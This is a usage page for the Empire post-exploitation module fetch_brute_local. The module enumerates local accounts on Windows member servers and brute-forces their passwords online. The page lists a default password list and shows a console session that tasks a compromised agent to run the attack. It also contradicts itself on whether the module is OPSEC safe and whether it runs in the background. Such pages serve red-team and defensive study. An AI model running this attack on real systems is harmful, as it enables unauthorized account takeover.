Fetch local accounts on a member server and perform an online brute force attack - Empire Module
This page contains detailed information about how to use the powershell/recon/fetch_brute_local Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Fetch local accounts on a member server and perform an online brute force attack
Module: powershell/recon/fetch_brute_local
Source code [1]: empire/server/modules/powershell/recon/fetch_brute_local.yaml
Source code [2]: empire/server/modules/powershell/recon/fetch_brute_local.py
MITRE ATT&CK:
T1110
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes
The fetch_brute_local module will logon to a member server using the agents account or a provided account, fetch the local accounts and perform a network based brute force attack.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the fetch_brute_local module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the fetch_brute_local module:
Agent
Agent to run the module on.
Passlist
Comma seperated password list that should be tested against each account found.
Default value: Welcome123,Password01,Test123!,Welcome2018
.
Additional Module Options
This is a list of additional options that are supported by the fetch_brute_local module:
Loginacc
Allows you to query the servers using credentials other than the credentials the agent is running as.
Loginpass
The password that comes with Loginacc.
ServerType
Allows you to narrow down the scope. It defaults to all windows servers.
Default value: Window*Server*
.
Verbose
Want to see failed logon attempts? And found users? Set this to any value.
Fetch_brute_local Example Usage
Here's an example of how to use the fetch_brute_local module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/recon/fetch_brute_local
Author Maarten Hartsuijker
@classityinfosec
Background True
Comments Inspired by Xfocus X-Scan. Recent Windows versions won't allow you to
query userinfo using regular domain accounts, but on 2003/2008 member
servers, the module might prove to be useful.
Description This module will logon to a member server using the agents account or
a provided account, fetch the local accounts and perform a network
based brute force attack.
Language powershell
Name powershell/recon/fetch_brute_local
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1110
,Record Options------------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------|-------------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run the module on. |
|------------|-------------------------------------|----------|-------------------------------------|
| Loginacc | | False | Allows you to query the servers |
| | | | using credentials other than the |
| | | | credentials the agent is running as |
|------------|-------------------------------------|----------|-------------------------------------|
| Loginpass | | False | The password that comes with |
| | | | Loginacc |
|------------|-------------------------------------|----------|-------------------------------------|
| Passlist | Welcome123,Password01,Test123!,Welc | True | Comma seperated password list that |
| | ome2018 | | should be tested against each |
| | | | account found |
|------------|-------------------------------------|----------|-------------------------------------|
| ServerType | Window*Server* | False | Allows you to narrow down the |
| | | | scope. It defaults to all windows |
| | | | servers. |
|------------|-------------------------------------|----------|-------------------------------------|
| Verbose | | False | Want to see failed logon attempts? |
| | | | And found users? Set this to any |
| | | | value. |
'------------'-------------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/recon/fetch_brute_local) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/recon/fetch_brute_local) > set Passlist Welcome123,Password01,Test123!,Welcome2018
[*] Set Passlist to Welcome123,Password01,Test123!,Welcome2018
(Empire: usemodule/powershell/recon/fetch_brute_local) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
- Maarten Hartsuijker
- @classityinfosec
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/recon/fetch_brute_local.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/recon/fetch_brute_local.py
- http://attack.mitre.org/techniques/T1110
See Also
Check also the following modules related to this module:
- powershell/recon/get_sql_server_login_default_pw
- powershell/recon/http_login
- powershell/recon/find_fruit
- powershell/situational_awareness/network/powerview/find_localadmin_access
- powershell/situational_awareness/network/powerview/get_localgroup
- powershell/situational_awareness/host/hostrecon
- powershell/situational_awareness/network/smbautobrute
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.